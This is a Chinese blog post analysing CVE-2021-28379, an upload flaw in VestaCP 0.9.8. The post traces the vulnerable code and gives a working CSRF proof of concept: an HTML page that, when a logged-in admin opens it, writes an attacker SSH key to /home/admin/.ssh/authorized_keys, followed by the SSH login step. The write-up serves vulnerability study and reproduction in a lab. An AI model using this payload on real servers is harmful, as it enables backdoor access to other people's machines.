

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="心如花木当向阳而生">
  <meta name="author" content="0x7b">
  <meta name="keywords" content="CSRF,SSH,File Upload">
  
    <meta name="referrer" content="no-referrer" />
  
  <title>[CVE-2021-28379]VestaCP 0.9.8 File Upload CSRF漏洞分析 - 0x7b&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.6.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"www.0x7b.cn","root":"/","version":"1.8.10","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"always","icon":"#"},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":1},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":"f6cc26bb9efdbbb57f32bbbe0a15b364","google":"G-SMJVP2PTHN","gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="0x7b's blog" type="application/atom+xml">
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>0x7b's blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item dropdown">
              <a class="nav-link dropdown-toggle" target="_self" role="button"
                 data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                <i class="iconfont icon-switch-fill"></i>
                生活
              </a>
              <div class="dropdown-menu" aria-labelledby="navbarDropdown">
                
                  
                  
                  
                  <a class="dropdown-item" href="/music/">
                    <i class="iconfont icon-music"></i>
                    我的音乐
                  </a>
                
                  
                  
                  
                  <a class="dropdown-item" href="/movies/">
                    <i class="iconfont icon-youtube-fill"></i>
                    看个电影
                  </a>
                
                  
                  
                  
                  <a class="dropdown-item" href="/bangumis/">
                    <i class="iconfont icon-bilibili-fill"></i>
                    番剧列表
                  </a>
                
                  
                  
                  
                  <a class="dropdown-item" href="/books/">
                    <i class="iconfont icon-books"></i>
                    书单推荐
                  </a>
                
              </div>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="[CVE-2021-28379]VestaCP 0.9.8 File Upload CSRF漏洞分析">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-04-15 00:00" pubdate>
        2021年4月15日 凌晨
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      785 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      10
       分钟
    </span>
  

  
  
    
      <!-- 不蒜子统计文章PV -->
      <span id="busuanzi_container_page_pv" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="busuanzi_value_page_pv"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">[CVE-2021-28379]VestaCP 0.9.8 File Upload CSRF漏洞分析</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：2021年6月3日 晚上
                
              </p>
            
            <div class="markdown-body">
              <h1 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h1><p>Vesta Control Panel（VestaCP）是一个开源的虚拟主机控制面板。 Vesta Control Panel 0.9.8-27 版本及之前版本存在代码问题漏洞，该漏洞源于<code>/web/upload/UploadHandler.php</code>可配合 CSRF 漏洞在管理员主页中创建<code>.ssh</code>文件夹并上传<code>authorized_keys</code>文件，最终可以通过 ssh 以 admin 身份访问服务器。</p>
<h1 id="0x01-漏洞分析"><a href="#0x01-漏洞分析" class="headerlink" title="0x01 漏洞分析"></a>0x01 漏洞分析</h1><p>定位漏洞文件<code>/web/upload/index.php</code><br><img src="https://cdn.nlark.com/yuque/0/2021/png/8398873/1618490838670-dec02324-6c35-4c02-9732-ca07d4c6c511.png#clientId=uba2e81e3-384f-4&from=paste&height=81&id=u1ad1ca6d&margin=%5Bobject%20Object%5D&originHeight=81&originWidth=407&originalType=url&status=done&style=none&taskId=u36e5de5c-c0ae-4dc2-9555-06a18741e33&width=407" srcset="/img/loading.gif" lazyload alt=""><br>该文件创建 UploadHandler 类的一个实例，相应上传操作在 UploadHandler.php 中实现。再定位到 UploadHandler.php，可以看到如下构造方法<br><img src="https://cdn.nlark.com/yuque/0/2021/png/8398873/1618490838835-0cff0558-d7d5-4ff6-b01d-3f24e74c0bd8.png#clientId=uba2e81e3-384f-4&from=paste&height=187&id=u01ee5ab5&margin=%5Bobject%20Object%5D&originHeight=227&originWidth=909&originalType=url&status=done&style=none&taskId=u90c0903f-0426-4dcc-aa22-43a293ede1d&width=750.5" srcset="/img/loading.gif" lazyload alt=""><br>accept_file_types 接受任意类型，此时首先应想到上传 php 来 getshell。但<code>/files/</code>目录并不能解析 php 文件，遂继续阅读代码看能否跨目录上传到 web 目录。继续跟到上传功能函数<code>handle_file_upload()</code>部分<br><img src="https://cdn.nlark.com/yuque/0/2021/png/8398873/1618490838725-dffb89d5-a491-4fdc-b814-c66f32ec7376.png#clientId=uba2e81e3-384f-4&from=paste&height=315&id=u1efd9efa&margin=%5Bobject%20Object%5D&originHeight=446&originWidth=1098&originalType=url&status=done&style=none&taskId=u7df71704-018c-45e1-b3c8-0b5adff61c6&width=776" srcset="/img/loading.gif" lazyload alt=""><br>该函数首先会调用<code>trim_file_name()</code>来对文件名进行修改，我们来看下他干了什么<br><img src="https://cdn.nlark.com/yuque/0/2021/png/8398873/1618490838703-bca1b1ce-637a-4374-bc51-cdcdad3cfd4b.png#clientId=uba2e81e3-384f-4&from=paste&height=174&id=u91bb2a4b&margin=%5Bobject%20Object%5D&originHeight=291&originWidth=808&originalType=url&status=done&style=none&taskId=u79e182b9-6970-45f8-bcd9-fef556977ba&width=482" srcset="/img/loading.gif" lazyload alt=""></p>
<ol>
<li>首先调用 stripslashes()从文件名中删除所有斜杠。</li>
<li>basename 只取出文件名，保证不包含任何路径</li>
<li>从文件名的开头和结尾删除所有控制字符（0x00 - 0x20)。</li>
</ol>
<p>完美打破了我们在文件名上尝试目录穿越上传 webshell 的想法。问题不大继续往下看，在图三中 handle_file_upload 最后几行获取上传目录，该目录就是文件将被上载到的目录，如果该目录不存在，<strong>则会创建</strong>该目录。继续跟到 get_upload_path 函数<br><img src="https://cdn.nlark.com/yuque/0/2021/png/8398873/1618490838976-954b75f0-761f-4cdd-8206-d5426fc0feeb.png#clientId=uba2e81e3-384f-4&from=paste&height=347&id=u1241b4e1&margin=%5Bobject%20Object%5D&originHeight=554&originWidth=866&originalType=url&status=done&style=none&taskId=u848ae959-bb22-406a-91e5-fd2bbbaec9a&width=542" srcset="/img/loading.gif" lazyload alt=""><br>我们可以 get 方式传递 dir 参数并将上传目录设置为任何目录，那现在我们是不就可以向 web 目录上传文件了呢。回到 handle_file_upload 中可以看到实际创建文件操作是由<code>v-copy-fs-file</code>脚本完成<br><img src="https://cdn.nlark.com/yuque/0/2021/png/8398873/1618490839746-ac60268e-8916-42cf-9125-b2f30d38c653.png#clientId=uba2e81e3-384f-4&from=paste&height=136&id=u8c7642ee&margin=%5Bobject%20Object%5D&originHeight=271&originWidth=1117&originalType=url&status=done&style=none&taskId=uf635bedc-0a87-4449-889d-f6ebd914fbe&width=558.5" srcset="/img/loading.gif" lazyload alt=""><br>该 bash 脚本位于/bin/目录下，找到对<code>$file_path</code>做检查操作的相关行<br><img src="https://cdn.nlark.com/yuque/0/2021/png/8398873/1618490840512-eb43b708-45e7-462b-a22d-c1782cc97eab.png#clientId=uba2e81e3-384f-4&from=paste&height=485&id=u6f62a1c2&margin=%5Bobject%20Object%5D&originHeight=828&originWidth=1136&originalType=url&status=done&style=none&taskId=ucd8173de-e3e5-4f5b-94d0-fd00a309a20&width=666" srcset="/img/loading.gif" lazyload alt=""><br>允许并仅允许写入文件到<code>/tmp/</code>或者<code>/home/admin/</code>目录下<br>回过头撸一下，首先我们可以上传任意文件，其次我们可以控制写入文件路径为<code>/tmp/</code>,<code>/home/admin/</code>或其子目录，再然后 VestaCP 通常安装在 linux 上默认支持 openssh。此时可以想到向<code>/home/admin/.ssh/</code>下写 ssh 公钥，之后通过 ssh 连接到服务器。但 upload/存在鉴权，需登录后才可访问。<br>结合 CSRF 构造 POC 如下：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">html</span>&gt;</span><br>  <span class="hljs-tag">&lt;<span class="hljs-name">head</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><br><span class="actionscript">      <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">exploit</span><span class="hljs-params">()</span> </span>&#123;</span><br><span class="actionscript">        <span class="hljs-keyword">var</span> mystring =</span><br><span class="actionscript">          <span class="hljs-string">"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDY463UG77/acyToxaVO3EbPlpzKCRLNHtWye7a0zLYYBw5Ylncktc7xo+xytuJpqdXxyMOJAtrMhSuEG/8tXtVRf317rPxn4CFd6cP6OZC36crzTdsZQzHIxBdogeHHdbluDOS+JD1MjEZU2pXg/A01jJJ2IQ6DHjkNeDhFH2/RChCiWEgGRDOgImg5EU0ScnBacJwXsoikxQgI/s/2RdKs5M9IOr2YclsTugPUnnGzMHPLyG3RNfS5MC/QyVTyGG1IInLttqhwYGpXBhAXZsahUyQd03PwgvMO3EhK6zBvgIGLFybSwVogDPgACT4/O6Je3ynMCUSexSuNkFPgvnh root@iZbp19ryeo1038lmdsso1pZ"</span>;</span><br><span class="actionscript">        <span class="hljs-keyword">var</span> fileContent = <span class="hljs-keyword">new</span> Blob([mystring], &#123;</span><br><span class="actionscript">          type: <span class="hljs-string">"text/plain"</span>,</span><br>        &#125;);<br><span class="actionscript">        myFormData = <span class="hljs-keyword">new</span> FormData();</span><br><span class="actionscript">        myFormData.append(<span class="hljs-string">"files"</span>, fileContent, <span class="hljs-string">"authorized_keys"</span>);</span><br><span class="actionscript">        fetch(<span class="hljs-string">"https://localhost:8083/upload/index.php?dir=/home/admin/.ssh/"</span>, &#123;</span><br><span class="actionscript">          method: <span class="hljs-string">"post"</span>,</span><br>          body: myFormData,<br><span class="actionscript">          credentials: <span class="hljs-string">"include"</span>,</span><br>        &#125;);<br>      &#125;<br>    <span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span><br>  <span class="hljs-tag">&lt;/<span class="hljs-name">head</span>&gt;</span><br>  <span class="hljs-tag">&lt;<span class="hljs-name">body</span> <span class="hljs-attr">onload</span>=<span class="hljs-string">"exploit();"</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">body</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">html</span>&gt;</span><br></code></pre></td></tr></table></figure>

<h1 id="0x02-漏洞复现"><a href="#0x02-漏洞复现" class="headerlink" title="0x02 漏洞复现"></a>0x02 漏洞复现</h1><p>傻瓜式环境搭建</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># Connect to your server as root via SSH</span><br>ssh root@your.server<br><span class="hljs-comment"># Download installation script</span><br>curl -O http://vestacp.com/pub/vst-install.sh<br><span class="hljs-comment"># Run it</span><br>bash vst-install.sh<br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.nlark.com/yuque/0/2021/png/8398873/1618490840144-18b8127f-b84c-45e9-a181-940f087c54b1.png#clientId=uba2e81e3-384f-4&from=paste&height=380&id=u1db9b6a0&margin=%5Bobject%20Object%5D&originHeight=380&originWidth=380&originalType=url&status=done&style=none&taskId=ud69dc2e3-6749-4866-ac68-d3bbcb5836d&width=380" srcset="/img/loading.gif" lazyload alt=""><br>将 POC 写入 exploit.html<br><img src="https://cdn.nlark.com/yuque/0/2021/png/8398873/1618490840225-2a27819b-2b69-46fa-bfe3-a111231fed6d.png#clientId=uba2e81e3-384f-4&from=paste&height=190&id=u97c10e00&margin=%5Bobject%20Object%5D&originHeight=380&originWidth=380&originalType=url&status=done&style=none&taskId=uc3dce5e2-ee5a-4e7c-ac2b-990f3a29fe7&width=190" srcset="/img/loading.gif" lazyload alt=""><br>登录状态点击<br><img src="https://cdn.nlark.com/yuque/0/2021/png/8398873/1618490840554-09581f11-8f89-46e6-995e-32002db31dda.png#clientId=uba2e81e3-384f-4&from=paste&height=380&id=u4747ea9c&margin=%5Bobject%20Object%5D&originHeight=380&originWidth=380&originalType=url&status=done&style=none&taskId=u32f2d752-29a5-4d29-b299-388c25d76a0&width=380" srcset="/img/loading.gif" lazyload alt=""><br>ssh -i id_rsa admin@target<br><img src="https://cdn.nlark.com/yuque/0/2021/png/8398873/1618490840604-fc4ed436-196e-4821-94f0-a8a6d2ea600e.png#clientId=uba2e81e3-384f-4&from=paste&height=380&id=u3bbb0878&margin=%5Bobject%20Object%5D&originHeight=380&originWidth=380&originalType=url&status=done&style=none&taskId=u530e4164-0b6c-47cf-886f-cdd927b752d&width=380" srcset="/img/loading.gif" lazyload alt=""></p>
<h1 id="0x03-Reference"><a href="#0x03-Reference" class="headerlink" title="0x03 Reference"></a>0x03 Reference</h1><p>[1] <a href="https://blog.fadyothman.com/cve-2021-28379-gaining-rce-via-ssh-backdoor-in-vestacp" target="_blank" rel="noopener">https://blog.fadyothman.com/cve-2021-28379-gaining-rce-via-ssh-backdoor-in-vestacp/</a><br>[2] <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-28379" target="_blank" rel="noopener">https://nvd.nist.gov/vuln/detail/CVE-2021-28379</a><br>[3] <a href="https://cxsecurity.com/issue/WLB-2021030100" target="_blank" rel="noopener">https://cxsecurity.com/issue/WLB-2021030100</a><br>[4] <a href="https://github.com/serghey-rodin/vesta/tree/0.9.8-24" target="_blank" rel="noopener">https://github.com/serghey-rodin/vesta/tree/0.9.8-24</a><br>[5] <a href="https://vestacp.com/install" target="_blank" rel="noopener">https://vestacp.com/install/</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">漏洞分析</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">漏洞分析</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" target="_blank" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/posts/1006/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">[CVE-2019-12792]Vesta控制面板0.9.8-24-上载处理程序中的权限提升漏洞分析</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/posts/1003/">
                        <span class="hidden-mobile">CXF服务列表暴露引发的安全问题</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js', function () {
        new Valine({
          el: "#valine",
          app_id: "rfUhxvYqe550TVAGj4qMLB3i-gzGzoHsz",
          app_key: "20s0nDXQlst20ih5nT0peGH9",
          placeholder: "说点什么",
          path: window.location.pathname,
          avatar: "retro",
          meta: ["nick","mail","link"],
          pageSize: "10",
          lang: "zh-CN",
          highlight: false,
          recordIP: true,
          serverURLs: "",
        });
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
    
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  
  <!-- 备案信息 -->
  <div class="beian">
    <span>
      <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow noopener">
        <img src="/img/police_beian.png" srcset="/img/loading.gif" lazyload>陕ICP备2020018798号-1
      </a>
    </span>
    
  </div>


  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.2/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      $('#local-search-input').on('click', function() {
        searchFunc(path, 'local-search-input', 'local-search-result');
      });
      $('#modalSearch').on('shown.bs.modal', function() {
        $('#local-search-input').focus();
      });
    })()
  </script>












  
    <!-- Baidu Analytics -->
    <script defer>
      var _hmt = _hmt || [];
      (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?f6cc26bb9efdbbb57f32bbbe0a15b364";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
      })();
    </script>
  

  
    <!-- Google Analytics -->
    <script defer>
      window.ga = window.ga || function () { (ga.q = ga.q || []).push(arguments) };
      ga.l = +new Date;
      ga('create', 'G-SMJVP2PTHN', 'auto');
      ga('send', 'pageview');
    </script>
    <script async src='https://www.google-analytics.com/analytics.js'></script>
  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
